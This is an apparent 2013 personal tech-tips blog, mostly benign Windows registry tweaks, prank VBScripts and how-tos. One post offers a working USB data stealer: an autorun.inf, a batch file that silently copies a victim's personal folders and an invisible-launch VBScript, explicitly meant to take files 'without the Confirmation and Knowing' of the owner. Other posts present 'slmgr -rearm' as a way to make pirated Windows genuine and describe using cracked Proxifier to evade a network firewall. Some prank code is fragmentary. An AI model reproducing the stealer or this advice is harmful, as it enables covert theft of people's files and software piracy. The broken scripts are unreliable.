
Thursday, 28 March 2013

How to Remove Shortcut Arrow on Icons in Windows

All shortcut icons in Windows operating system, including Windows XP, Windows Vista and Windows 7, has a small arrow overlay on the icons. The arrow is used to different between a shortcut from an actual physical file itself. The shortcut arrow is presented on all desktop icons, and icons in Windows Explorer, and it can be easily remove or hide.

How to Hide and Remove Shortcut Arrow from Desktop Icons and Other Icons:

1. Go to start click RUN (OR) press "windows key + R"
    Typr "regedit" on Run click OK.

2. Navigate to the following registry key:
    HKEY_CLASSES_ROOT \lnkfile

3. Delete the IsShortcut registry value in the right pane.
    Tip: It’s also workable to just rename the IsShortcut registry entry to another name, such as

4. Some other type of documents and files may be shortcut arrow on their icons too. To remove the shortcut
    arrow overlay image on these icons, navigate to each of the following registry keys, and then repeat step 2
    and step 3 above to deactivate the shortcut arrow:


5. Exit from Registry Editor.

6. Logout and login again or restart Explorer for the change to take effect.

Note that removing the shortcut arrow with hack.

Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer context menu, as in essence, removing the “IsShortcut” effectively forces Windows to treat the shortcut as real hard file. In Windows 7, it may also cause error such as unable to pin shortcut to Taskbar or Start Menu. To avoid these issue, use another workaround to remove shortcut arrow.

How to make Windows 7 Genuine using Command Prompt

we all know that everyone can't buy a genuine windows 7, because cost is too high.

Lots of Windows 7 users have experienced the error message that "Windows 7 is not genuine".

This error message comes if you use pirated or OEM versions of Windows 7.

If windows 7 is not genuine, even you can't change the background wallpaper or any other display related option on your PC.

So now i'm going to show you a easy way to make your windows 7 genuine using command prompt.

How to make Windows 7 genuine using Command Prompt:

Press Windows key + R

Now "run" box will appear , in "run" box type CMD

Click on OK

Note : Run CMD as Administrator

Now command prompt will appear

In command prompt type SLMGR -REARM
NOTE: (there is a SPACE between slmgr and -rearm)

Hit Enter.

Wait 5-10 seconds

Now a message will appear as shown in image below.

Done !!!

Now your Windows 7 is genuine...

Restart your PC once.
Hereafter you won't see the warning message that "Windows 7 is not genuine"

Note: To Check your windows is Genuine or Not... Click Here

Check your Windows 7 is Genuine or Not

So you have a computer with Windows 7 installed, but you’re not sure if you are running a genuine version of the OS. You may have this issue if you downloaded a copy of Windows 7 or if someone installed it for you.

Either way, there are a couple of different ways to check and make sure that your Windows 7 copy is genuine.

Method 1Activate Windows Dialog

The first way to validate that Windows 7 is genuine is to click on Start, then type "activate windows" in the search box. click on it.

If your copy of Windows 7 is activated and genuine, you will get a message that says “Activation was successful” and you will see the Microsoft Genuine software logo on the right hand side.

Method 2Validate Online

The second way to determine if you have a valid copy of Windows 7 is to use the validation tool on the Microsoft website.

If you ever tried to download updates from Microsoft, you’ve probably noticed that sometimes your copy of Windows has to be validated before it allows you to start the download.

Well, you can use that tool independently of downloading an update by going to the following address:

Then click on the Validate link at the top. Make sure that you visit the site while in Internet Explorer, otherwise it will ask you do download a small program onto your computer in order to validate.

Method 3Control Panel

The third way to check for genuine Windows 7 is to go to the Control Panel. Click on Start, then Control Panel, then click on System and Security, and finally click on System.

Then scroll all the way down to the bottom and you should see a section called Windows activation, which says “Windows is activated” and gives you the Product ID. It also includes the genuine Microsoft software logo.

Thursday, 21 March 2013

Top 10 Vbscript Codings To Play Prank With Friends

Today i tried to bring out some of the Vb script(.vbs) coding by which we can able to play pranks with our friends..
This Vb script coding are not harmful in any sense.But use them carefully.. :)

1)Continually pop out your friend's CD Drive.

Description: This VBs coding is used to eject and insert cd drive of your friend's computer.
To use This Vb Script Just copy the vbs code given below on a notepad file and save it as myscript.vbs
To stop this Vb script..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000

2) Toggle your friend's Caps Lock button simultaneously:

Description: This small VBs coding is used to Toggle Caps Lock Button Simultaneously.
To use This Vb Script Just copy the vbs code given below on notepad file and save it as myscript.vbs
To stop this Vb script..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

3) Frustrate your friend by hitting Enter simultaneously:

Description: This small VBs coding is used to press Enter Key Simultaneously.
To use This Vb Script Just copy the vbs code given below on notepad file and save it as myscript.vbs
To stop this Vb script..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

4) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

Description: This VBs coding will open a notepad window and Type a message just like your computer is typing it automatically.
You can also modify message by changing the text under WshShell.SendKeys function.
To use This Vb Script Just copy the vbs code given below on notepad file and save it as myscript.vbs
To stop this Vb script..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

5) Frustrate your friend by making this Vb Script hit Backspace simultaneously:

Description: This VBs coding will press a backspace key simultaneously.
You can also modify message by changing the text under WshShell.SendKeys function.
To use This VBScript Just copy the vbs code given below on notepad file and save it as myscript.vbs
To stop this VBscript..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"

6) Convey a Message Like "You are a fool" on your friends computer simultaneously:

Description: This VBs is a simpler version of VBScript that Type "Hello, how are you? I am good thanks".
Instead of that It will pop up a window on your friends computer and convey a message Like "You are a fool"
You can also modify message by changing the text under WshShell.SendKeys function.
To use This VBScript Just copy the vbs code given below on notepad file and save it as myscript.vbs
To stop this VBscript..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "You are a fool."

7)create your own text to speech convertor

Description: This VBs will create a text to speech convertor shell.
with the help of this VBscript you can convert your words to speech.
To use This VBScript Just copy the vbs code given below on notepad file and save it as myscript.vbs
To stop this VBscript..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

8)Play Windows Startup tone then convey a message..

Description: This VBs will First play your Windows startup tone then Convey a message on screen.
you can any message by changing "your message here" field.
To use This VBScript Just copy the vbs code given below on notepad file and save it as myscript.vbs
To stop this VBscript..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

Set objVoice = CreateObject("SAPI.SpVoice")
Set objFile = CreateObject("SAPI.SpFileStream.1")

objFile.Open "Windows XP Startup.wav"
objVoice.Speakstream objFile
Wscript.Echo "your message here"

9)Make Your Computer Speech Any Message

Description: This VBs will Make your computer speech by using microsoft assistant voice.
You can change the Speech message by changing "your message here" field.
To use This VBScript Just copy the vbs code given below on notepad file and save it as myscript.vbs
To stop this VBscript..Open Task manager by Pressing ctrl+alt+del
and then click on Process tab and kill the process "Wscript.exe"

On Error Resume Next

strAgentName2 = "MERLIN"
strAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".acs"
Set objAgent2 = CreateObject("Agent.Control.2")

objAgent2.Connected = TRUE
objAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)

objPeter.MoveTo 700,300

objPeter.Play "GetAttention"
objPeter.Play "GetAttentionReturn"

objPeter.Speak("your message here")

Wscript.Sleep 1000

Set objAction= objPeter.Hide

Do While objPeter.Visible = True
Wscript.Sleep 250

10)Check your Computer is Male Or Female

This Is really a cool Vb Script prank to check your computer's gender.
To use this Vb Script copy the below code on notepad and save it as myscript.vbs

CreateObject(“SAPI.SpVoice”).Speak "i love you"

How To Run Android Apps On Windows Xp,Windows Vista Or Windows 7

Now you can run all of the famous Android Apps on your Windows PC.This is the easiest Tutorial to all those who wants to test the apps without wasting their time.

To run Android applications on windows xp,vista or windows 7,all you need is a small andorid emulator which you have to install on your pc.

there are lots of android emulator exists in market but we are using one of the well known "Blue stack BETA". the
earlier version is "Blue Stack Alpha" which is  only compatible with  Windows7 PC’s and Windows8. Best part of new beta edition is basically converting the ARM compatible Android apps to run on x86 platform and that too with a great efficiency. Or simply it means Now the software is compatible with Vista and windows7 and Windows XP also.In new Blue stack BETA Users can download applications from GetJar, 1Mobile, and Amazon and test them on windows machine. So apps will be downloaded by the software and install with in it.

You can download Bluestack BETA From Here:

Win 8 

After downloading install this on your windows machine and then signup by using your facebook or bluestack account.
after login download android applications and run them on your windows machine..:)
isn't it easy..try out yourself..and post comments.. :)

Wednesday, 20 March 2013

Install Windows XP On Pendrive

Hello Everyone,
So Friends Today I will show You how to install windows xp On 2 GB Pendrive :)
You can also Use 4 or 8 GB Pendrive respectively..

The process is Very Much Simple and straight forward And the best thing is about that is You need Only A single Software To do that.
When This Will be done..You will Get a Portable Windows Xp Installed On  Pendrive Or Thumbdrive,After that You can Also Able To install software On Your Pendrive :)

So Lets Begin The Procedure..

STEP 1: To Install Windows XP On Pendrive First of all You Need To Download A Software Named "WinSetupFromUSB".
Download Link For Software Is 

After Downloading Install The Software On Your Computer's Hard Disk.

Insert Your Pendrive Or Thumb drive.And Run The Software As You Can See In The Image Below.

STEP 4:If Your Pendrive is Not Detected Yet Then You Have To Click Refresh Button On Software To Refresh.After Detection Mark At Removable And Finally Click On HP format Tool.
After that a Window Will Open Which Looks Like This.

STEP 5:Click On the Start To Start Formatting.all the data on pendrive Will Lost In formatting make sure You Copy All The Files Before Proceeding.
After Formatting click "Close" To Close The HP Formatting Dialogue Box.

Now Insert The XP CD In Your Cd Rom.

Now Go Back To The WinSetupFromUSB Software And Press The Browse Button To Browse The Location Of the Cd,
 In My Computer Its G: its different in different Computers Make Sure You have Selected A right Drive.

STEP 8: Click On Go And Waits Until the Full Progress Bar.

STEP 9:After Completion Restart Your Computer And Change Your Boot Sequence and Set Pendrive Or Removable Media As A Highest Priority And You Will Be Done..Now You have Your Windows Xp operating system In your Pocket. :)

Enjoy.. :)

Trick To Reset Memory Card Password

Hello Friends,

Many Of Us have A Common Habit To Put Password In Things To Keep Our Things Secrete..But Some Times This Habit Becomes a cause of our frustration..If you read the title of the post then you know that for what i am talking for..:(Yeah you are right..i am talking about Reset of Memory Card Password..
Why I said That Memory Card Password Recovery Becomes a Cause of Our Frustration...?
Its Simple..Cause If anyone Set A password In Memory Card Then It Is Not Easily Recoverable.. Even It doesn't Remove After Formatting..:(
off-course many of Online tools and software claims that they can able to Reset Memory Card Password..But They Are Only a Waste Of time And Money..

But Friends There Is a Possible Way By Which You Can Able To Reset Memory Card Password.. I tried This Method And Works Fine For Me..So today I am Sharing It With You :)

So Lets Start..
STEP 1: If You Are Using A Java Based Or Any Other Phone Then First Of all You Have To Insert Your Memory Card In To A Symbian Phone to Reset Memory Card Password..if You don't have any Symbian Phone..Contact With Your Friends You will Find it Easily.. :)

STEP 2: After That Go To This Downloading Link And Download X-plore.. X-plore is a free symbian File Manager Utility.

STEP 3: Then Install X-plore On Your Symbian Mobile.

STEP 5: Open X-plore And Press 0 "To Show System Files".

STEP 6: After That Go To The Following Path C:/SYS/DATA/MMCSTORE with X-plore.

STEP 7:Press 3 under Options To Set It in Hex Viwer.

STEP 8: In Third Column You Will See A Line Of Code Like This... TMSD02G (c??”?x???8?2?1?2?6)

Check The Character Between '?'
Bingo Its Your Password..i.e  8216 :))
Now Reset Memory Card Password by entering this password.

Fix please insert a disk into drive error in windows

Many Times When We Plug In Our Removable Media Such As Pendrives In Our Pc And Try To Access Them From My Computer Or From Explorer.Windows Give Us A Error Like "Please Insert A Disk Into Drive".

This Problem Is Not Easy To Solve..Many Software And Site Claims That They Can Fix That Problem But As My Personal experience They Are Just A Scam. :(

Then What To Do To Fix please insert a disk into drive Error?

There Are Possibly Two Ways To Solve This Problem.

First Method

Download Hp USB Disk Storage Format Tool From Here . And try To Format Your Pendrive With That..

Many Times This Method Works..But If Its Not Working In Your Case..Don't Worry We Have Another One To Try..

Second Method

Download JetFlash Online Recovery Tool And Try To Fix This Problem With That.

Click Here To Download JetFlash Online Recovery Tool

If You Found Any Problem In Using That Tool...Then,Just Navigate To Bottom Of That Downloading Page...They Also Put A Nice How To Tutorial On That Page...

I Had Fixed Couples Of My Pendrives Suffering With please insert a disk into drive Error By Above Two Methods...Which had The Same Problem Which You Are facing Now...If Your Problem Is Not Solved By These Two Methods Then Your Pendrive Have A Serious Hardware Problem...Sadly,You Have To Purchase A New One..

Monday, 18 March 2013

Extract a DVD ISO Image to a Folder

There is a huge selection of ISO tools out there that come with the extracting capability as one of the basic features. Many of them are shareware or commercial licenses. Having said that, if you happen to have those programs like MagicISOISOBusterPowerISO, or WinRAR, etc.. you could use them to extract the ISO images as well.
This articles explain another option of extracting ISO image to hard drive folders, using a freeware called "7-Zip". 7-Zip is a compression utility similar to Winzip except that it's free, and it can handle additional file formats such as ISO.
You can download 7-Zip here.
The most simple way to extract an ISO image with 7-zip is to right-click on the image file and select "7-Zip" > "Extract Here".
This will extract all files and folders from the selected image to the current directory.

An alternative method, especially useful when you want to selectively extract the files/folders from your image:
  1. Start 7-Zip.
  2. At the main panel, navigate to the folder where ISO image file is located.

  3. Double-click on the image file. The contents of the ISO will be listed.

  4. If you want to extract only specific files/folders, highlight the files and folders you want to extract. Otherwise, leave everything unhighlighted.
  5. Click the button "Extract".
  6. Under "Copy To", click on the button "..." and navigate to the destination folder, where to want to extract the files to, then click "OK".

  7. The program will now start to extract the ISO image...

Friday, 15 March 2013

Top 10 computer mouse tips everyone should know

Most computer users don't take full advantage of the computer Mouse. Below are computer mouse tips and secrets that help you get the full potential of your computer mouse and increase your overall productivity while on the computer. Shift key and mouse click

Many text editors and programs allow you to highlight all or portions of text using the Shift key and the mouse. For example, place the cursor at the beginning of a paragraph, hold down the Shift key and click at the end of the paragraph to highlight the full paragraph.
Take full advantage of the scroll wheel
Today, everyone is fully aware of a mouse wheels ability to scroll up and down on a page. However, this wheel can also do so much more, as shown below.
  • The mouse wheel is not just a wheel, it can also be used as a button. Pressing down on the wheel will act like a third mouse button. This can be used to open a web page in a tab by clicking the wheel on any link and can also be used to close a tab by clicking the wheel on any open tab.
  • Quickly Zoom in and Out on a web page, word document, excel spreadsheet, etc. by holding down the Ctrl key and scrolling up to zoom in and down to zoom out.
  • Move forward and backwards while browsing the Internet by holding down the Shift key and scrolling up and down. Scrolling down goes back and scrolling up goes forward.
Select with double and triple click
Any word can be easily selected by double-clicking the word. If you want to highlight the whole paragraph, click the mouse button three times on any text in the paragraph.
Use the right-click
Take full advantage of the right-click any time you highlight text or wish to view the properties of an object. For example, if you highlight a file or text, you can right-click that highlighted item copy it and then right-click anywhere else to paste it.
Tip If you right-click on any file or text and drag it while continuing to hold the right button, when you let go you will be given the option to move or copy that file or text. This saves you the extra step of having to right-click where you want to paste the item.
Tip While in a browser pressing and holding Ctrl while clicking on any link will open that link in a new tab.
Ctrl key and mouse click or highlight
While holding down the Ctrl key you can left-click to select multiple objects or highlight multiple sections of text. For example, in Microsoft Windows you could hold down the Ctrl key and click to select multiple files at once. If you wanted to highlight different parts of a paragraph or web page, you could also hold down the Ctrl key and select each section you wanted to copy.
Tip Mozilla Firefox users can also hold down the Ctrl key and individually click on each cell in a table they wish to copy or drag their mouse down a row to select just that row or text without selecting any of the other text in that table.
Use the mouse side buttons
Many new computer mice have buttons on the side of the mouse. These buttons can be programmed to do anything, however, by default the left-thumb button can be used to go back on a web page. This makes browsing the Internet more enjoyable since you do not need to move the mouse cursor to the browser back arrow button in order to go back a page.
Use the Windows Snap To feature
Take full advantage of the Windows mouse Snap To feature, which will automatically move your mouse to buttons that appear in a dialog box. For example, if you delete a file or close a window you may get a prompt asking you if you are sure you want to perform the task. With the Snap To feature enabled, the mouse cursor automatically moves to the Ok button, so all you will have to do is click the mouse button if you agree. This saves you the time of having to move the mouse cursor over to the Ok button and then click Ok. To enable this feature open the Mouse properties under the Windows Control Panel and check the Snap To check box under the Pointer Options tab.
Tip While changing this feature we also suggest looking at other available options in the Mouse settings. For example, increasing the Motion speed can also help increase your productivity while using the mouse.
Manage the open window with the mouse
Double-click the top title bar of any window to maximize a window or if it is already maximized resize it to a window. You can also double-click the icon for the window in the top-left corner of the window to close that window.
Move the mouse with your keyboard
Instead of using the mouse that came with your computer you can also enable Windows to use the number pad as a mouse.
Customize your mouse
Finally, if you have a mouse with more than two buttons, installing the included mouse software will allow you to customize the mouse even more. For example, if you don't use the side buttons to move back and forth in a web page change it to something you do more often, such as switching between open windows or opening the calculator.

Trick to Secretly Copy and Steal Data from Computer to a USB or Pendrive

But here is a Trick which can help us to Copy and Steal all the Secret Data or Files from the Victims Computer by just plugging the USB or Pendrive to the Computer.

This Trick could prove to be very helpfull and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

To use this Trick just follow these simple Steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

action=Click OK to Run

3) Save this file as autorun.inf.

4) Open Notepad again.

5) Copy and Paste the following Code :

@echo off 
:: variables
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off

6) Save this file as File.bat.

7) Open Notepad again.

8) Copy and Paste the following Code :

Run """" & WScript.Arguments(0) & """", 0, False

9) Save this file as Invisible.vbs.

10) Now again open Notepad.

11) Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

12) Save this as Launch.bat.

13) Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.

14) Create a folder named “Data” where the Stolen contents would be Copied automatically.

15) Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.

So it is simple Trick to Secretly Copy and Steal Data from Computer to a USB or Pendrive.

Saturday, 9 March 2013

Hide all drives from My Computer

How to Hide the drives(c:,d:,e:,...etc) in Ur Computer

This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.

  1. Go to Start -> Run.
  2. Type regedit
  3. Now go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
  4. Now in the right pane, create a new DWORD item and name it NoDrives (it is case sensitive).
  5. Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
  6. Now restart your computer.
  7. So, now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created. Again restart your computer. You can now see all the drives again. Magic.......

Convert Any Document or Web Page to PDF

Somebody just told you that you need to have Adobe Acrobat (Writer) to create a PDF file? Guess what, you can get away from that pricey piece of software if you just need to convert some documents to pdf, without a need of fancy editing the pdf document.
Here's how. Thanks to the BullZip, who provides a Free Pdf printer. With this free tool, you can simply "print out" your document or webpage to a pdf file, just about the same way as you print it out to a printer.

You can visit for more information about the software.
Here the direct link to BullZip downloads page: Downloads
  1. To get started, first follow the link above and download Free Pdf Printer from BullZip, then install it to your computer.
  2. Once you're done, you might need to close the program (or the web browser) which you're currently viewing the document. This helps refreshing the list of available printers on your computer.
  3. Once you get back to the document you want to convert, perform the same steps are you print out the document, i.e. File > Print ...
  4. When you see the Print window pop-up, select "Bullzip PDF Printer" under "Printers", then click "OK".
  5. BullZip PDF Printer will then start to analyze your document and display a new pop-up window, where you can direct it to the location you want to save the pdf file.
  6. Follow the pop-up windows and.. hola! The PDF document is created!

New useful hotkeys (keyboard shortcuts) in Windows 8

There are a few useful hotkeys (keyboard shortcuts) introduced in Windows 8 which can make your Windows 8 experience better. Some of them are given below:

Win key                Toggles between Start Screen and Windows Desktop

Win+X                 Opens Quick Access Menu

Win+PrntScr        Automatically saves screenshot in Pictures folder

Win+C                 Shows Charms Bar

Win+I                  Shows Settings panel

Win+K                 Launches Devices charm

Win+H                 Launches Share charm

Win+Q                Launches Search charm

Win+W                Launches Settings search page

Win+F                 Launches Files search page

Win+Tab             Shows Metro apps switcher as mentioned in point 4

Win+Z                 Shows / hides App bar at Start Screen to show all apps

Win+Spacebar     Toggles between input languages and keyboard layout

Win+,                   From Start Screen peeks at the Desktop

Win+Enter            Launches Narrator

Ctrl+F1                Minimizes / maximizes ribbon in Windows Explorer

Ctrl+Tab              Launches All Apps list on Start Screen

Win+spacebar      Toggles between input languages and keyboard layout

Win+,                   Peeks at the desktop

Win+Enter            Starts Narrator

Win+PgUp           Moves full screen window (i.e., the new Metro UI) to the monitor on the left in multi-mon

Win+PgDn           Moves full screen to the right

Win+Shift + .        Snaps application and/or moves the snapped app to left

Win+.                   Snaps application and/or moves the snapped app to right

Win+k                  Opens Devices charm

Win+h                  Opens Share charm

Win+q                  Opens Search charm

Win+w                 Opens Settings search

Win+f                   Opens Files search

Win+z                   Toggle AppBar

Wednesday, 6 March 2013


1. Latest Firefox Browser
 2. Install Cocoon Add-On
Step 1: Install the firefox Add-on Cocoon by clicking image

Step 2: Create an account on
Step 3: Press the power button on the cocoon tool bar that can be found on the left of the screen and enter the login details.


  1. Download TOR Browser by clllicking on photo
  2. Install or Extract TOR browser in a portable USB drive.
  3. Plug your USB drive in computer and start TOR browser and start surfing on Internet, Now all websites like FACEBOOK, ORKUT, BLOGGER are accessible.
This HACK work for all blocked websites. You can easily open blocked websites using this technique. When you search anything using google In the each search result there are two things in blue color prior to URL i.e Cached and Similar. To view that blocked Website You have to click on Cached

Bypass Cyberoam With Proxifier

Let’s start to bypass cyberoam..……
We have to use some tools to do this like :-
1)Proxifier cracked
We are using proxifier to bypass cyberoam……
proxifier 2
First of all you have to download proxifier from the given link……
Now extract it in any folder….
Crack it by copy n paste it’s cracked file….
Now you have to find your DNS ip address
you can find DNS in the given site….
Now copy the IP and open proxifier….
Go to option/proxy setting…
click on ADD in right side…
PORT:3128 (This port is open in every computer)
Select HTTPS
click on OK
Now you the work is over… :D
Start open every blocked site…….you want to open… :D

How to create hidden user account in Windows XP, Windows 7

All windows operating system versions like windows xp, windows vista windows 7 provide a feature to create multiple user accounts. You can provides each user accounts some specific permissions. If there are more than one user accounts on a computer. They will be displayed on welcome screen. You can login to specific user account. In fact while displaying all user accounts on welcome screen has always some security risks. Somebody can hack your computer by just guessing your password as username is already displayed here. To make security more stronger on your computer, your can hide a user account from the welcome screen in windows xp, windows vista and windows 7 by simple hack as explained in following steps: -

  • Go to Start >> Run or Press Windows key+R.

  • Type regedit in Run dialogue box opened.
           If it prompts for your permission to edit registry, just press Yes.
  • After registry editor opens, just follow the path as given HKEY_LOCAL_MACHINE >> Software >>Microsoft >> Windows NT >> CurrentVersion >> Winlogon >> SpecialAccounts >> UserList
  • If you can’t see SpecialAccount under Winlogon, just right-click on Windlogon >> New >> Key. Name this key as SpecialAccounts.
  • Now right click on SpecialAccounts >> New >> Key. Name this key as UserList ( Case sensitive)
  • If SpecialAccounts and UserList are already present under Winlogon, You need not to perform above two steps. Just continue from below step.
  • Now right click on UserList >> New >> DWORD(32-bit) Value

  • Just name this value exactly as the user account which you want to hide

  • Restart your computer. You will not see that specific user account on welcome screen on starting windows this time.
  • For logging in to hidden account in windows xp, First option is to go to reboot windows in safe mode. In safe mode all the user accounts will be shown. And you can log in to hidden account. Besides you can type manually username and password on welcome screen to log in hidden account.
  • Secondly you can press CTRL+ALT+DEL ( two times)
  • But to log in hidden user account in windows 7, you can read our detailed article   After making some changes as explained in this article. You will be able to log in by typing username and password in welcome screen just as in windows xp.
  • Now again to show this hidden user account, just delete above DWORD(32-bit) value created. That user account will be again shown on welcome screen.
  • So you can hide any user account in windows xp, windows vista and windows 7 to make your computer security more better.

How To enable user account login with username and password in Windows 7

If you are running windows 7 on your computer , you will be well known that windows 7 use to show all user accounts on welcome screen which exist on your computer. One can select any one user account and subsequently can fill password for that user account and may be able to log in to computer. But this feature has always some security risks. As all the user account names are displayed on welcome screen. So your username is always displayed to anybody stranger. He don’t need to find your username. He can guess your password too and can log in to your computer. He can damage your system or can stole some important data from your computer.
To overcome this problem you can enable Windows XP style welcome screen where any computer user needs to enter USERNAME as well as PASSWORD on welcome screen after starting windows 7. So any computer user account name will not be displayed on welcome screen. So this can help you in hiding all user accounts from welcome screen. Besides you will be able to log in any hidden user account by this screen. To enable windows XP style log in screen which require password as well as username during log in, you can follow simple steps given below:-

Go to Start menu >> Run or Press Windows key+R

Type regedit in Run dialogue box

If it prompts for your permission press Yes.

When registry editor is opened just follow the path as HKEY_LOCAL_MACHINE >> SOFTWARE >>Microsoft >> Windows >> CurrentVersion >> Policies >. System

Locate dontdisplaylastusername in right hand side files as shown in above image. Right click ondontdisplaylastusername and select Modify.

To enable Windows XP style log in screen with username and password, put the value as 1 and keep the base as Hexadecimal.

To revert back to new windows 7 style log in which require only password for any one user account out of shown on welcome screen. You can put value as 0 and base as Hexadecimal.

Finally press OK. Restart your computer. Now you will see welcome screen in window 7 requires username and password for log in to any user account. In this way, you can enable windows xp style user account log in with username and password to make your computer security more better.

Locking Your PC with Mouse

follow these simple steps to lock your PC:

1- Firstly Right click on your desktop and make new shortcut

2- Now you will see the browse block. Fill this in this block-

--> rundll32 user32.dll,LockWorkStation <-- br="">

3-Now give any name to the shortcut you want and hit Enter.

That’s it… Now when you double click on this shortcut Your PC will get locked..

Sunday, 3 March 2013

How to Solve Desktop Background Problem in Windows 7, If Windows is not Genuine

If you are using Windows 7 version copy which is not genuine, then you will be facing a problem regarding desktop background wallpaper. Every time you set up desktop background wallpaper in windows 7, it gets disappeared on restarting your computer. Then by default a black blank desktop background is shown. So you will be unable to set permanent desktop background wallpaper on your windows 7 computer unlike genuine Windows 7 computer. Due to this, you feel much discomfort and you cannot give your computer look of your own choice.
You will be able to set desktop background wallpaper of your own choice permanently to your windows 7 computer by following this simple steps:-
Steps to Remove Black Blank Desktop Background in Windows 7:

Firstly identify the wallpaper which you want to set as desktop background.

For example you want to set wallpaper named WINTER AUTUMN. Just right click on this wallpaper file and go to its Properties. You will see a windows as shown below.

Note the full location of that particular wallpaper as D:\IMAGES\wallpaper\WINTER AUTUMN.jpg

Go to start >> Run or Press Windows key along with R. Type regedit and hit Enter. If it prompts for your permission to edit registry, just press Yes.
Now Navigate to HKEY_CURRENT_USER -> Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System

You will see a key named Wallpaper in right hand side panel. Double click on key named Wallpaper.
A settings window will pop-up. Put the location of wallpaper copied in earlier step which you want to set as desktop background in Value data box.
Press OK. Restart your computer.
You will see that desired wallpaper has been set as desktop background on your windows 7 computer. In this way you can avoid this black blank desktop background wallpaper problem and set your own custom desktop background wallpapers on your windows 7 computer permanently even if your windows 7 version is not genuine.

Hiee.. frns you can get some useful tips and tricks here njooyyy..........